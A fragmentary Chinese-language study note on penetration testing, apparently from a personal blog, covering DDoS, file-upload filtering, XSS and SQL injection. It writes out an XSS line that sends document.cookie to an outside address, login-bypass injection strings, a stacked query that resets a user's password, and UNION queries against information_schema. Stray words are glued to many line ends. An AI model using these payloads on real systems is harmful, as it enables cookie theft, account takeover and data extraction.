慢慢記錄有關滲透3

  • 根據一教程簡單整理,還沒整理完。慢慢拼湊。。。php

  • cookies 存儲 敏感信息html

  • ddos拒絕服務攻擊: 多線程併發 或底層代碼 tcp簡歷握手鍊接mysql

  • 文件上傳的漏洞 文件上傳過濾 經過後綴名過濾 二進制存儲文件頭和尾獲取是否有效 修改服務器核心參數,禁止腳本引擎運行在系統裏web

  • xss跨站攻擊 惡意插入web頁面html代碼。特殊目的html會被執行目的 如何寫xss腳本:單反提供輸入的接口,都應檢查合法的檢查html代碼 <input type="button" value="點我" onclick="alert('你好')"/> <img src="http圖片連接" onclick="alert('nibeiheile')"/> 獲取cookie:fiddler發cookie。 獲取方法1cookie:js--document.cookie onclick="alert('document.cookie')"/> location.href="192.168.1.1/cookie.php?cookie="+document.cookie" />sql

方法2:onclick="document.getElementByid('元素值').value=document.cookie" />數據庫

  • sql注入:服務器

  • 最通用的攻擊手段,關係型數據庫cookie

  • 服務器對sql注入的防範也是很是嚴密的多線程

  • 1.獲取服務器端數據庫內容併發

  • 2.修改數據庫內容 如 CSDN被攻擊

  • 1.php,asp,jsp,mysql,oracle,access.......

  • sql語句 利用sq注入修改密碼 1.服務器沒有對輸入長度進行驗證。 2.須要猜想代表列明和加密方式。3.禁用測試不用非法 利用url地址參數進行注入: 1.試探是否有sql注入的可能 2.單引號是字符串的分隔符。3.直接把單引號轉義' '

username password

select * from user where username = 'username' and password='password' $username=x' or userid=1 #' select * from user where username = 'x' or userid=1 #'' and password='password' #才userid 1 2 3或uid或id 如登錄頁面輸入x' or userid=1 #'提示密碼錯誤說明用戶存在那就證實用戶存在有漏洞注入

select username, password form user where username='username' if (count() == 1) if (password=$password) 登錄成功 x'; update user set password='123456' where userid=1#' 長度頁面若是驗證長度能夠post服務器 select username, password form user where username='x'; update user set password='123456' where userid=1#'' 若是密碼不能被修改把明文的123456加密成md5嘗試 猜想多數列明代表和密碼加密方式等。。。。。。。。。。

select * from thread where locale=en#My%20Shares:/// n#My%20Shares:/// order by 10 select * from thread where locale=en#My%20Shares:/// n#My%20Shares:/// and 1=2

n#My%20Shares:///' select * from thread where locale=en#My%20Shares:///' //語法不對

union select 1,2,3,4

select * from thread where locale=en#My%20Shares:/// and 1=2 union select 1,database(),user(),4 limit0,1 mysql函數顯示列 select 1,column_name,1,2,3,4 from information_schema.columns where table_schema

  • 暴力破解:
相關文章
相關標籤/搜索